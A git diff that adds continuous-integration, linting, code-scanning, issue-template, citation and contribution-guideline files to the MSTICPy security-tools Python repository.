diff --git a/.ci_config/UserExclusion.xml b/.ci_config/UserExclusion.xml
new file mode 100644
index 000000000..17aedd4de
--- /dev/null
+++ b/.ci_config/UserExclusion.xml
@@ -0,0 +1,18 @@
+<?xml version="1.0" encoding="utf-8" ?>
+<!-- IMPORTANT: This file must be saved under %appdata%\PoliCheck_Azure\Config folder -->
+<!--    When adding new values, please use UPPER CASE - all values will be compared only to the UPPER CASE strings -->
+<PoliCheckExclusions>
+
+  <!-- Each of these exclusions is a folder name - if \[name]\ exists in the file path, it will be skipped -->
+  <Exclusion Type="FolderPathFull">.MYPY_CACHE|TESTDATA|HTMLCOV</Exclusion>
+
+  <!-- Each of these exclusions is a folder name - if any folder or file starts with "\[name]", it will be skipped -->
+  <!--<Exclusion Type="FolderPathStart">ABC|XYZ</Exclusion>-->
+  
+  <!-- Each of these file types will be completely skipped for the entire scan -->
+  <Exclusion Type="FileType">.CSV</Exclusion>
+  
+  <!-- The specified file names will be skipped during the scan regardless which folder they are in -->
+  <Exclusion Type="FileName">TLD_SEED.TXT|QUERY_DATA.CSV|SIGNIN_CHARTS.YAML|GEOPIP.PY</Exclusion>
+  
+  </PoliCheckExclusions>
\ No newline at end of file
diff --git a/.ci_config/coverage.ini b/.ci_config/coverage.ini
new file mode 100644
index 000000000..1eed5a1fb
--- /dev/null
+++ b/.ci_config/coverage.ini
@@ -0,0 +1,8 @@
+[run]
+omit =
+    */hostedtoolcache.windows.Python/*
+    *.site-packages.msticpy*
+
+[report]
+exclude_lines =
+    @deprecated
\ No newline at end of file
diff --git a/.ci_config/credscan.json b/.ci_config/credscan.json
new file mode 100644
index 000000000..05d4f1edd
--- /dev/null
+++ b/.ci_config/credscan.json
@@ -0,0 +1,42 @@
+{
+    "tool": "Credential Scanner",
+    "suppressions": [
+        {
+            "placeholder": ", secret=secret)",
+            "_justification": "This is a code usage example and does not contain a secret."
+        },
+        {
+            "file": "AzureData.rst.txt",
+            "_justification": "This is a code usage example and does not contain a secret."
+        },
+        {
+            "file": "UploadData.rst.txt",
+            "_justification": "This is a code usage example and does not contain a secret."
+        },
+        {
+            "file": "msticpyconfig.rst.txt",
+            "_justification": "This is a code usage example and does not contain a secret."
+        },
+        {
+            "file": "test_splunk_driver.py",
+            "_justification": "This is a test case and does not contain a secret."
+        },
+        {
+            "file": "test_splunk_uploader.py",
+            "_justification": "This is a test case and does not contain a secret."
+        },
+        {
+            "file": "msticpyconfig.yaml",
+            "_justification": "Test data that does not contain a secret"
+        },
+        {
+            "file": "UploadData.rst.txt",
+            "_justification": "This is a code usage example and does not contain a secret."
+        },
+        {
+            "file": "test_pkg_config.py",
+            "_justification": "This is a test case and does not contain a secret."
+        }
+
+    ]
+}
\ No newline at end of file
diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md
new file mode 100644
index 000000000..dd84ea782
--- /dev/null
+++ b/.github/ISSUE_TEMPLATE/bug_report.md
@@ -0,0 +1,38 @@
+---
+name: Bug report
+about: Create a report to help us improve
+title: ''
+labels: ''
+assignees: ''
+
+---
+
+**Describe the bug**
+A clear and concise description of what the bug is.
+
+**To Reproduce**
+Steps to reproduce the behavior:
+1. Go to '...'
+2. Click on '....'
+3. Scroll down to '....'
+4. See error
+
+**Expected behavior**
+A clear and concise description of what you expected to happen.
+
+**Screenshots**
+If applicable, add screenshots to help explain your problem.
+
+**Desktop (please complete the following information):**
+ - OS: [e.g. iOS]
+ - Browser [e.g. chrome, safari]
+ - Version [e.g. 22]
+
+**Smartphone (please complete the following information):**
+ - Device: [e.g. iPhone6]
+ - OS: [e.g. iOS8.1]
+ - Browser [e.g. stock browser, safari]
+ - Version [e.g. 22]
+
+**Additional context**
+Add any other context about the problem here.
diff --git a/.github/ISSUE_TEMPLATE/feature_request.md b/.github/ISSUE_TEMPLATE/feature_request.md
new file mode 100644
index 000000000..bbcbbe7d6
--- /dev/null
+++ b/.github/ISSUE_TEMPLATE/feature_request.md
@@ -0,0 +1,20 @@
+---
+name: Feature request
+about: Suggest an idea for this project
+title: ''
+labels: ''
+assignees: ''
+
+---
+
+**Is your feature request related to a problem? Please describe.**
+A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
+
+**Describe the solution you'd like**
+A clear and concise description of what you want to happen.
+
+**Describe alternatives you've considered**
+A clear and concise description of any alternative solutions or features you've considered.
+
+**Additional context**
+Add any other context or screenshots about the feature request here.
diff --git a/.github/dependabot.yml b/.github/dependabot.yml
new file mode 100644
index 000000000..56bbe854f
--- /dev/null
+++ b/.github/dependabot.yml
@@ -0,0 +1,18 @@
+version: 2
+updates:
+- package-ecosystem: pip
+  directory: "/"
+  schedule:
+    interval: daily
+    time: "13:00"
+  ignore:
+  - dependency-name: dnspython
+    versions:
+    - 2.1.0
+  - dependency-name: idna
+    versions:
+    - "3.1"
+  - dependency-name: moz-sql-parser
+    versions:
+    - 4.18.21031
+    - 4.21.21059
diff --git a/.github/workflows/codeql-analysis.yml b/.github/workflows/codeql-analysis.yml
new file mode 100644
index 000000000..f8f64eafb
--- /dev/null
+++ b/.github/workflows/codeql-analysis.yml
@@ -0,0 +1,71 @@
+# For most projects, this workflow file will not need changing; you simply need
+# to commit it to your repository.
+#
+# You may wish to alter this file to override the set of languages analyzed,
+# or to provide custom queries or build logic.
+#
+# ******** NOTE ********
+# We have attempted to detect the languages in your repository. Please check
+# the `language` matrix defined below to confirm you have the correct set of
+# supported CodeQL languages.
+#
+name: "CodeQL"
+
+on:
+  push:
+    branches: [ main ]
+  pull_request:
+    # The branches below must be a subset of the branches above
+    branches: [ main ]
+  schedule:
+    - cron: '40 13 * * 4'
+
+jobs:
+  analyze:
+    name: Analyze
+    runs-on: ubuntu-latest
+    permissions:
+      actions: read
+      contents: read
+      security-events: write
+
+    strategy:
+      fail-fast: false
+      matrix:
+        language: [ 'python' ]
+        # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python' ]
+        # Learn more:
+        # https://docs.github.com/en/free-pro-team@latest/github/finding-security-vulnerabilities-and-errors-in-your-code/configuring-code-scanning#changing-the-languages-that-are-analyzed
+
+    steps:
+    - name: Checkout repository
+      uses: actions/checkout@v2
+
+    # Initializes the CodeQL tools for scanning.
+    - name: Initialize CodeQL
+      uses: github/codeql-action/init@v1
+      with:
+        languages: ${{ matrix.language }}
+        # If you wish to specify custom queries, you can do so here or in a config file.
+        # By default, queries listed here will override any specified in a config file.
+        # Prefix the list here with "+" to use these queries and those in the config file.
+        # queries: ./path/to/local/query, your-org/your-repo/queries@main
+
+    # Autobuild attempts to build any compiled languages  (C/C++, C#, or Java).
+    # If this step fails, then you should remove it and run the build manually (see below)
+    - name: Autobuild
+      uses: github/codeql-action/autobuild@v1
+
+    # ℹ️ Command-line programs to run using the OS shell.
+    # 📚 https://git.io/JvXDl
+
+    # ✏️ If the Autobuild fails above, remove it and uncomment the following three lines
+    #    and modify them (or add more) to build your code if your project
+    #    uses a compiled language
+
+    #- run: |
+    #   make bootstrap
+    #   make release
+
+    - name: Perform CodeQL Analysis
+      uses: github/codeql-action/analyze@v1
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
new file mode 100644
index 000000000..fa2998318
--- /dev/null
+++ b/.github/workflows/python-package.yml
@@ -0,0 +1,126 @@
+# This workflow will install Python dependencies, run tests and lint with a variety of Python versions
+# For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions
+
+name: MSTICPy CI build and check
+
+on:
+  push:
+    branches: [ main ]
+  pull_request:
+    branches: [ main ]
+
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    strategy:
+      matrix:
+        python-version: ['3.8']
+    env:
+      PROSPECTOR_VER: 1.3.1
+    steps:
+    # Print out details about the run
+    - name: Dump GitHub context
+      env:
+        GITHUB_CONTEXT: ${{ toJSON(github) }}
+      run: echo "$GITHUB_CONTEXT"
+    - name: Dump job context
+      env:
+        JOB_CONTEXT: ${{ toJSON(job) }}
+      run: echo "$JOB_CONTEXT"
+    # end print details
+    - uses: actions/checkout@v2
+    - name: Set up Python ${{ matrix.python-version }}
+      uses: actions/setup-python@v2
+      with:
+        python-version: ${{ matrix.python-version }}
+    - name: Cache pip
+      uses: actions/cache@v2
+      with:
+        # This path is specific to Ubuntu
+        path: ~/.cache/pip
+        # Look to see if there is a cache hit for the corresponding requirements file
+        key: ${{ runner.os }}-pip-${{ hashFiles('requirements.txt') }}
+        restore-keys: |
+          ${{ runner.os }}-pip-
+          ${{ runner.os }}-
+    - name: Install dependencies
+      run: |
+        python -m pip install --upgrade pip wheel setuptools
+        if [ -f requirements-all.txt ]; then
+          python -m pip install -r requirements-all.txt
+        elif [ -f requirements.txt ]; then
+          python -m pip install -r requirements.txt;
+        fi
+        python -m pip install -e .
+    - name: Install test dependencies
+      run: |
+        python -m pip install flake8 black bandit mypy lxml pylint types-attrs
+        python -m pip install pytest pytest-cov pytest-xdist pytest-check aiohttp nbconvert jupyter_contrib_nbextensions
+        python -m pip install Pygments respx pytest-xdist markdown beautifulsoup4 Pillow
+        python -m pip install "pandas>=1.3.0"
+    - name: Prepare test dummy data
+      run: |
+        mkdir ~/.msticpy
+        mkdir ~/.msticpy/mordor
+        cp ./tests/testdata/geolite/GeoLite2-City.mmdb ~/.msticpy
+        touch ~/.msticpy/GeoLite2-City.mmdb
+        cp -r ./tests/testdata/mordor/* ~/.msticpy/mordor
+        touch ~/.msticpy/mordor/mitre_tact_cache.pkl
+        touch ~/.msticpy/mordor/mitre_tech_cache.pkl
+        touch ~/.msticpy/mordor/mordor_cache.pkl
+    - name: Pytest
+      env:
+        MAXMIND_AUTH: ${{ secrets.MAXMIND_AUTH }}
+        IPSTACK_AUTH: ${{ secrets.IPSTACK_AUTH }}
+        MSTICPYCONFIG: ./tests/msticpyconfig-test.yaml
+        MSTICPY_BUILD_SOURCE: fork
+      run: |
+        pytest tests -n auto --junitxml=junit/test-${{ matrix.python-version }}-results.xml --cov=msticpy --cov-report=xml
+      if: ${{ always() }}
+    - name: black
+      run: |
+        black -t py36 --diff --check --exclude venv .
+      if: ${{ always() }}
+    - name: flake8
+      run: |
+        # stop the build if there are Python syntax errors or undefined names
+        flake8 msticpy --count --select=E9,F63,F7,F82 --show-source --statistics
+        # exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide
+        flake8 --max-line-length=90 --exclude=tests* . --ignore=E501,W503 --jobs=auto
+      if: ${{ always() }}
+    - name: pylint
+      run: |
+        pylint msticpy --disable=bad-continuation,duplicate-code --disable=E1135,E1101,E1133
+      if: ${{ always() }}
+    - name: mypy
+      run: |
+        mypy --ignore-missing-imports --follow-imports=silent --show-column-numbers --junit-xml junit/mypy-test-${{ matrix.python-version }}-results.xml msticpy
+      if: ${{ always() }}
+    - name: bandit
+      run: |
+        bandit -x tests -r -s B303,B404,B603,B607,B608 msticpy
+      if: ${{ always() }}
+    - name: flake8
+      run: |
+        flake8 --max-line-length=90 --exclude=tests* . --ignore=E501,W503 --jobs=auto
+      if: ${{ always() }}
+    - name: prospector
+      run: |
+        # install this separately since it uses older versions of pylint/isort
+        # chain running to installation since this sometimes fails
+        python -m pip install prospector[with_pyroma]==${{ env.PROSPECTOR_VER }} && prospector --ignore-paths tests --without-tool pylint
+      if: ${{ always() }}
+    - name: Upload pytest test results
+      uses: actions/upload-artifact@v2
+      with:
+        name: pytest-results-${{ matrix.python-version }}
+        path: junit/test-${{ matrix.python-version }}-results.xml
+      # Use always() to always run this step to publish test results when there are test failures
+      if: ${{ always() }}
+    - name: Upload mypy test results
+      uses: actions/upload-artifact@v2
+      with:
+        name: Mypy results ${{ matrix.python-version }}
+        path: junit/mypy-test-${{ matrix.python-version }}-results.xml
+      # Use always() to always run this step to publish test results when there are test failures
+      if: ${{ always() }}
diff --git a/.gitignore b/.gitignore
index 894a44cc0..9b0017040 100644
--- a/.gitignore
+++ b/.gitignore
@@ -102,3 +102,21 @@ venv.bak/
 
 # mypy
 .mypy_cache/
+/msticpy.code-workspace
+/docs/source/_build/**
+**/.vscode*
+**/Kqlmagic_temp_files/**
+
+# pycharm project settings
+*\.idea*
+
+#MorphChart test output
+morphchart_package/
+
+# Merge conflict files
+**.orig
+
+#kql magic temp files
+/docs/notebooks/kqlmagic/*
+/kqlmagic/**
+/GitExtensions.settings
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
new file mode 100644
index 000000000..cf90861eb
--- /dev/null
+++ b/.pre-commit-config.yaml
@@ -0,0 +1,39 @@
+repos:
+  - repo: https://github.com/pre-commit/pre-commit-hooks
+    rev: v3.2.0
+    hooks:
+      - id: check-yaml
+      - id: check-json
+      - id: trailing-whitespace
+        args: [--markdown-linebreak-ext=md]
+  - repo: https://github.com/ambv/black
+    rev: 22.1.0
+    hooks:
+      - id: black
+        language: python
+        args:
+          - -t
+          - py36
+  - repo: https://github.com/PyCQA/pylint
+    rev: v2.12.2
+    hooks:
+      - id: pylint
+        args:
+          - --disable=bad-continuation,duplicate-code,import-error
+          - --ignore-patterns=test_
+  - repo: https://gitlab.com/pycqa/flake8
+    rev: 3.9.2
+    hooks:
+      - id: flake8
+        args:
+          - --extend-ignore=E0401,E501
+          - --max-line-length=90
+          - --exclude=tests,test*.py
+  - repo: local
+    hooks:
+      - id: check_reqs_all
+        name: check_reqs_all
+        entry: python -m tools.create_reqs_all
+        pass_filenames: False
+        language: python
+        types: [python]
diff --git a/.pylintrc b/.pylintrc
new file mode 100644
index 000000000..08259ac64
--- /dev/null
+++ b/.pylintrc
@@ -0,0 +1,561 @@
+[MASTER]
+
+# A comma-separated list of package or module names from where C extensions may
+# be loaded. Extensions are loading into the active Python interpreter and may
+# run arbitrary code.
+extension-pkg-whitelist=
+
+# Add files or directories to the blacklist. They should be base names, not
+# paths.
+ignore=CVS
+
+# Add files or directories matching the regex patterns to the blacklist. The
+# regex matches against base names, not paths.
+ignore-patterns=
+
+# Python code to execute, usually for sys.path manipulation such as
+# pygtk.require().
+#init-hook=
+
+# Use multiple processes to speed up Pylint. Specifying 0 will auto-detect the
+# number of processors available to use.
+jobs=1
+
+# Control the amount of potential inferred values when inferring a single
+# object. This can help the performance when dealing with large functions or
+# complex, nested conditions.
+limit-inference-results=100
+
+# List of plugins (as comma separated values of python modules names) to load,
+# usually to register additional checkers.
+load-plugins=
+
+# Pickle collected data for later comparisons.
+persistent=yes
+
+# Specify a configuration file.
+#rcfile=
+
+# When enabled, pylint would attempt to guess common misconfiguration and emit
+# user-friendly hints instead of false-positive error messages.
+suggestion-mode=yes
+
+# Allow loading of arbitrary C extensions. Extensions are imported into the
+# active Python interpreter and may run arbitrary code.
+unsafe-load-any-extension=no
+
+
+[MESSAGES CONTROL]
+
+# Only show warnings with the listed confidence levels. Leave empty to show
+# all. Valid levels: HIGH, INFERENCE, INFERENCE_FAILURE, UNDEFINED.
+confidence=
+
+# Disable the message, report, category or checker with the given id(s). You
+# can either give multiple identifiers separated by comma (,) or put this
+# option multiple times (only on the command line, not in the configuration
+# file where it should appear only once). You can also use "--disable=all" to
+# disable everything first and then reenable specific checks. For example, if
+# you want to run only the similarities checker, you can use "--disable=all
+# --enable=similarities". If you want to run only the classes checker, but have
+# no Warning level messages displayed, use "--disable=all --enable=classes
+# --disable=W".
+disable=print-statement,
+        parameter-unpacking,
+        unpacking-in-except,
+        old-raise-syntax,
+        backtick,
+        long-suffix,
+        old-ne-operator,
+        old-octal-literal,
+        import-star-module-level,
+        non-ascii-bytes-literal,
+        raw-checker-failed,
+        bad-inline-option,
+        locally-disabled,
+        locally-enabled,
+        file-ignored,
+        suppressed-message,
+        useless-suppression,
+        deprecated-pragma,
+        use-symbolic-message-instead,
+        apply-builtin,
+        basestring-builtin,
+        buffer-builtin,
+        cmp-builtin,
+        coerce-builtin,
+        execfile-builtin,
+        file-builtin,
+        long-builtin,
+        raw_input-builtin,
+        reduce-builtin,
+        standarderror-builtin,
+        unicode-builtin,
+        xrange-builtin,
+        coerce-method,
+        delslice-method,
+        getslice-method,
+        setslice-method,
+        no-absolute-import,
+        old-division,
+        dict-iter-method,
+        dict-view-method,
+        next-method-called,
+        metaclass-assignment,
+        indexing-exception,
+        raising-string,
+        reload-builtin,
+        oct-method,
+        hex-method,
+        nonzero-method,
+        cmp-method,
+        input-builtin,
+        round-builtin,
+        intern-builtin,
+        unichr-builtin,
+        map-builtin-not-iterating,
+        zip-builtin-not-iterating,
+        range-builtin-not-iterating,
+        filter-builtin-not-iterating,
+        using-cmp-argument,
+        eq-without-hash,
+        div-method,
+        idiv-method,
+        rdiv-method,
+        exception-message-attribute,
+        invalid-str-codec,
+        sys-max-int,
+        bad-python3-import,
+        deprecated-string-function,
+        deprecated-str-translate-call,
+        deprecated-itertools-function,
+        deprecated-types-field,
+        next-method-defined,
+        dict-items-not-iterating,
+        dict-keys-not-iterating,
+        dict-values-not-iterating,
+        deprecated-operator-function,
+        deprecated-urllib-function,
+        xreadlines-attribute,
+        deprecated-sys-function,
+        exception-escape,
+        comprehension-escape,
+        bad-continuation,
+        D203,
+        D212
+
+# Enable the message, report, category or checker with the given id(s). You can
+# either give multiple identifier separated by comma (,) or put this option
+# multiple time (only on the command line, not in the configuration file where
+# it should appear only once). See also the "--disable" option for examples.
+enable=c-extension-no-member
+
+
+[REPORTS]
+
+# Python expression which should return a note less than 10 (10 is the highest
+# note). You have access to the variables errors warning, statement which
+# respectively contain the number of errors / warnings messages and the total
+# number of statements analyzed. This is used by the global evaluation report
+# (RP0004).
+evaluation=10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10)
+
+# Template used to display messages. This is a python new-style format string
+# used to format the message information. See doc for all details.
+#msg-template=
+
+# Set the output format. Available formats are text, parseable, colorized, json
+# and msvs (visual studio). You can also give a reporter class, e.g.
+# mypackage.mymodule.MyReporterClass.
+output-format=text
+
+# Tells whether to display a full report or only the messages.
+reports=no
+
+# Activate the evaluation score.
+score=yes
+
+
+[REFACTORING]
+
+# Maximum number of nested blocks for function / method body
+max-nested-blocks=5
+
+# Complete name of functions that never returns. When checking for
+# inconsistent-return-statements if a never returning function is called then
+# it will be considered as an explicit return statement and no message will be
+# printed.
+never-returning-functions=sys.exit
+
+
+[BASIC]
+
+# Naming style matching correct argument names.
+argument-naming-style=snake_case
+
+# Regular expression matching correct argument names. Overrides argument-
+# naming-style.
+#argument-rgx=
+
+# Naming style matching correct attribute names.
+attr-naming-style=snake_case
+
+# Regular expression matching correct attribute names. Overrides attr-naming-
+# style.
+#attr-rgx=
+
+# Bad variable names which should always be refused, separated by a comma.
+bad-names=foo,
+          bar,
+          baz,
+          toto,
+          tutu,
+          tata
+
+# Naming style matching correct class attribute names.
+class-attribute-naming-style=any
+
+# Regular expression matching correct class attribute names. Overrides class-
+# attribute-naming-style.
+#class-attribute-rgx=
+
+# Naming style matching correct class names.
+class-naming-style=PascalCase
+
+# Regular expression matching correct class names. Overrides class-naming-
+# style.
+#class-rgx=
+
+# Naming style matching correct constant names.
+const-naming-style=UPPER_CASE
+
+# Regular expression matching correct constant names. Overrides const-naming-
+# style.
+#const-rgx=
+
+# Minimum line length for functions/classes that require docstrings, shorter
+# ones are exempt.
+docstring-min-length=-1
+
+# Naming style matching correct function names.
+function-naming-style=snake_case
+
+# Regular expression matching correct function names. Overrides function-
+# naming-style.
+#function-rgx=
+
+# Good variable names which should always be accepted, separated by a comma.
+good-names=i,
+           j,
+           k,
+           ex,
+           Run,
+           _
+
+# Include a hint for the correct naming format with invalid-name.
+include-naming-hint=no
+
+# Naming style matching correct inline iteration names.
+inlinevar-naming-style=any
+
+# Regular expression matching correct inline iteration names. Overrides
+# inlinevar-naming-style.
+#inlinevar-rgx=
+
+# Naming style matching correct method names.
+method-naming-style=snake_case
+
+# Regular expression matching correct method names. Overrides method-naming-
+# style.
+#method-rgx=
+
+# Naming style matching correct module names.
+module-naming-style=snake_case
+
+# Regular expression matching correct module names. Overrides module-naming-
+# style.
+#module-rgx=
+
+# Colon-delimited sets of names that determine each other's naming style when
+# the name regexes allow several styles.
+name-group=
+
+# Regular expression which should only match function or class names that do
+# not require a docstring.
+no-docstring-rgx=^_
+
+# List of decorators that produce properties, such as abc.abstractproperty. Add
+# to this list to register other decorators that produce valid properties.
+# These decorators are taken in consideration only for invalid-name.
+property-classes=abc.abstractproperty
+
+# Naming style matching correct variable names.
+variable-naming-style=snake_case
+
+# Regular expression matching correct variable names. Overrides variable-
+# naming-style.
+#variable-rgx=
+
+
+[FORMAT]
+
+# Expected format of line ending, e.g. empty (any line ending), LF or CRLF.
+expected-line-ending-format=
+
+# Regexp for a line that is allowed to be longer than the limit.
+ignore-long-lines=^\s*(# )?<?https?://\S+>?$
+
+# Number of spaces of indent required inside a hanging  or continued line.
+indent-after-paren=4
+
+# String used as indentation unit. This is usually "    " (4 spaces) or "\t" (1
+# tab).
+indent-string='    '
+
+# Maximum number of characters on a single line.
+max-line-length=100
+
+# Maximum number of lines in a module.
+max-module-lines=1000
+
+# List of optional constructs for which whitespace checking is disabled. `dict-
+# separator` is used to allow tabulation in dicts, etc.: {1  : 1,\n222: 2}.
+# `trailing-comma` allows a space between comma and closing bracket: (a, ).
+# `empty-line` allows space-only lines.
+no-space-check=trailing-comma,
+               dict-separator
+
+# Allow the body of a class to be on the same line as the declaration if body
+# contains single statement.
+single-line-class-stmt=no
+
+# Allow the body of an if to be on the same line as the test if there is no
+# else.
+single-line-if-stmt=no
+
+
+[LOGGING]
+
+# Logging modules to check that the string format arguments are in logging
+# function parameter format.
+logging-modules=logging
+
+
+[MISCELLANEOUS]
+
+# List of note tags to take in consideration, separated by a comma.
+notes=FIXME,
+      XXX,
+      TODO
+
+
+[SIMILARITIES]
+
+# Ignore comments when computing similarities.
+ignore-comments=yes
+
+# Ignore docstrings when computing similarities.
+ignore-docstrings=yes
+
+# Ignore imports when computing similarities.
+ignore-imports=yes
+
+# Minimum lines number of a similarity.
+min-similarity-lines=10
+
+
+[SPELLING]
+
+# Limits count of emitted suggestions for spelling mistakes.
+max-spelling-suggestions=4
+
+# Spelling dictionary name. Available dictionaries: none. To make it working
+# install python-enchant package..
+spelling-dict=
+
+# List of comma separated words that should not be checked.
+spelling-ignore-words=
+
+# A path to a file that contains private dictionary; one word per line.
+spelling-private-dict-file=
+
+# Tells whether to store unknown words to indicated private dictionary in
+# --spelling-private-dict-file option instead of raising a message.
+spelling-store-unknown-words=no
+
+
+[TYPECHECK]
+
+# List of decorators that produce context managers, such as
+# contextlib.contextmanager. Add to this list to register other decorators that
+# produce valid context managers.
+contextmanager-decorators=contextlib.contextmanager
+
+# List of members which are set dynamically and missed by pylint inference
+# system, and so shouldn't trigger E1101 when accessed. Python regular
+# expressions are accepted.
+generated-members=
+
+# Tells whether missing members accessed in mixin class should be ignored. A
+# mixin class is detected if its name ends with "mixin" (case insensitive).
+ignore-mixin-members=yes
+
+# Tells whether to warn about missing members when the owner of the attribute
+# is inferred to be None.
+ignore-none=yes
+
+# This flag controls whether pylint should warn about no-member and similar
+# checks whenever an opaque object is returned when inferring. The inference
+# can return multiple potential results while evaluating a Python object, but
+# some branches might not be evaluated, which results in partial inference. In
+# that case, it might be useful to still emit no-member and other checks for
+# the rest of the inferred objects.
+ignore-on-opaque-inference=yes
+
+# List of class names for which member attributes should not be checked (useful
+# for classes with dynamically set attributes). This supports the use of
+# qualified names.
+ignored-classes=optparse.Values,thread._local,_thread._local
+
+# List of module names for which member attributes should not be checked
+# (useful for modules/projects where namespaces are manipulated during runtime
+# and thus existing member attributes cannot be deduced by static analysis. It
+# supports qualified module names, as well as Unix pattern matching.
+ignored-modules=
+
+# Show a hint with possible names when a member name was not found. The aspect
+# of finding the hint is based on edit distance.
+missing-member-hint=yes
+
+# The minimum edit distance a name should have in order to be considered a
+# similar match for a missing member name.
+missing-member-hint-distance=1
+
+# The total number of similar names that should be taken in consideration when
+# showing a hint for a missing member.
+missing-member-max-choices=1
+
+
+[VARIABLES]
+
+# List of additional names supposed to be defined in builtins. Remember that
+# you should avoid to define new builtins when possible.
+additional-builtins=
+
+# Tells whether unused global variables should be treated as a violation.
+allow-global-unused-variables=yes
+
+# List of strings which can identify a callback function by name. A callback
+# name must start or end with one of those strings.
+callbacks=cb_,
+          _cb
+
+# A regular expression matching the name of dummy variables (i.e. expected to
+# not be used).
+dummy-variables-rgx=_+$|(_[a-zA-Z0-9_]*[a-zA-Z0-9]+?$)|dummy|^ignored_|^unused_
+
+# Argument names that match this expression will be ignored. Default to name
+# with leading underscore.
+ignored-argument-names=_.*|^ignored_|^unused_
+
+# Tells whether we should check for unused import in __init__ files.
+init-import=no
+
+# List of qualified module names which can have objects that can redefine
+# builtins.
+redefining-builtins-modules=six.moves,past.builtins,future.builtins,builtins,io
+
+
+[CLASSES]
+
+# List of method names used to declare (i.e. assign) instance attributes.
+defining-attr-methods=__init__,
+                      __new__,
+                      setUp
+
+# List of member names, which should be excluded from the protected access
+# warning.
+exclude-protected=_asdict,
+                  _fields,
+                  _replace,
+                  _source,
+                  _make
+
+# List of valid names for the first argument in a class method.
+valid-classmethod-first-arg=cls
+
+# List of valid names for the first argument in a metaclass class method.
+valid-metaclass-classmethod-first-arg=cls
+
+
+[DESIGN]
+
+# Maximum number of arguments for function / method.
+max-args=7
+
+# Maximum number of attributes for a class (see R0902).
+max-attributes=10
+
+# Maximum number of boolean expressions in an if statement.
+max-bool-expr=5
+
+# Maximum number of branch for function / method body.
+max-branches=12
+
+# Maximum number of locals for function / method body.
+max-locals=15
+
+# Maximum number of parents for a class (see R0901).
+max-parents=7
+
+# Maximum number of public methods for a class (see R0904).
+max-public-methods=20
+
+# Maximum number of return / yield for function / method body.
+max-returns=6
+
+# Maximum number of statements in function / method body.
+max-statements=50
+
+# Minimum number of public methods for a class (see R0903).
+min-public-methods=1
+
+
+[IMPORTS]
+
+# Allow wildcard imports from modules that define __all__.
+allow-wildcard-with-all=no
+
+# Analyse import fallback blocks. This can be used to support both Python 2 and
+# 3 compatible code, which means that the block might have code that exists
+# only in one or another interpreter, leading to false positives when analysed.
+analyse-fallback-blocks=no
+
+# Deprecated modules which should not be used, separated by a comma.
+deprecated-modules=optparse,tkinter.tix
+
+# Create a graph of external dependencies in the given file (report RP0402 must
+# not be disabled).
+ext-import-graph=
+
+# Create a graph of every (i.e. internal and external) dependencies in the
+# given file (report RP0402 must not be disabled).
+import-graph=
+
+# Create a graph of internal dependencies in the given file (report RP0402 must
+# not be disabled).
+int-import-graph=
+
+# Force import order to recognize a module as part of the standard
+# compatibility libraries.
+known-standard-library=
+
+# Force import order to recognize a module as part of a third party library.
+known-third-party=enchant
+
+
+[EXCEPTIONS]
+
+# Exceptions that will emit a warning when being caught. Defaults to
+# "Exception".
+overgeneral-exceptions=Exception
diff --git a/.readthedocs.yaml b/.readthedocs.yaml
new file mode 100644
index 000000000..f3e98c92a
--- /dev/null
+++ b/.readthedocs.yaml
@@ -0,0 +1,7 @@
+version: 2
+
+python:
+   version: 3.7
+   install:
+      - requirements: docs/requirements.txt
+      - requirements: requirements.txt
\ No newline at end of file
diff --git a/CITATION.cff b/CITATION.cff
new file mode 100644
index 000000000..52e361e24
--- /dev/null
+++ b/CITATION.cff
@@ -0,0 +1,35 @@
+abstract: |
+    "Microsoft Threat Intelligence Python Security Tools - MSTICPy
+    
+    A library for InfoSec investigation and hunting in Jupyter Notebooks. It includes functionality to:
+    - query log data from multiple sources
+    - enrich the data with threat intelligence, geo-locations and Azure resource data
+    - extract Indicators of Activity (IoA) from logs and unpack encoded data
+    - analyze for anomalous sessions and  events
+    - visualize data using interactive timelines, process trees and multi-dimensional Morph Charts"
+authors: 
+- given-names: Ian
+  family-names: Hellen
+  affiliation: "Microsoft Corp."
+  alias: ianhelle
+- given-names: Pete
+  family-names: Bryan
+  affiliation: "Microsoft Corp."
+  alias: petebryan
+- given-names: Ashwin
+  family-names: Patil
+  affiliation: "Microsoft Corp."
+  alias: ashwinpatil
+cff-version: "1.2.0"
+date-released: 2021-04-14
+keywords: 
+  - CyberSecurity
+  - Jupyter
+  - InfoSec
+license: MIT
+message: "If you use this software, please cite it using these metadata."
+repository-code: "https://github.com/microsoft/msticpy"
+repository-artifact: "https://pypi.org/project/msticpy"
+url: "https://github.com/microsoft/msticpy"
+title: MSTICPy
+version: "1.0.0"
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
new file mode 100644
index 000000000..b0c191120
--- /dev/null
+++ b/CONTRIBUTING.md
@@ -0,0 +1,39 @@
+Contributions of improvements, fixes and new features are welcomed.
+We use a continuous integration pipeline that enforces unit tests and code style. We aim to keep
+the code clear, testable and well-documented.
+
+# Guidelines for code:
+
+## Unit Tests
+All new code should have unit tests with at least 80% code coverage. There are some exceptions to this: for example, code that accesses online data and requires authentication. We can work with you on getting this to work in our build.
+We use pytest but some of the existing tests are also Python unittest compatible.
+
+## Type hints
+Use type annotations for parameters and return values in public methods, properties and functions.
+[Python Type Hints documentation](https://docs.python.org/3/library/typing.html)
+
+## Docstrings
+Our documentation is automatically built for Readthedocs using Sphinx.
+All public modules, functions, classes and methods should be documented using the numpy documenation standard.
+[numpy docstring guide](https://numpydoc.readthedocs.io/en/latest/format.html)
+
+## Code Formatting
+We use black everywhere and enforce this in the build.
+[Black - The Uncompromising Code Formatter](https://github.com/psf/black)
+
+## Linters/Code Checkers
+We use the following code checkers:
+- pylint (with --disable=bad-continuation)
+- mypy
+- bandit (with -s B303,B404,B603,B607)
+- flake8 (with --ignore=E501,W503)
+- prospector (see prospector.yml in root of repo for config used). Prospector runs:
+  - pycodestyle
+  - pydocstyle
+  - pep8
+  - pyroma
+  - pep257
+
+## A musical guide
+[The PEP8 Song](https://www.youtube.com/watch?v=hgI0p1zf31k)
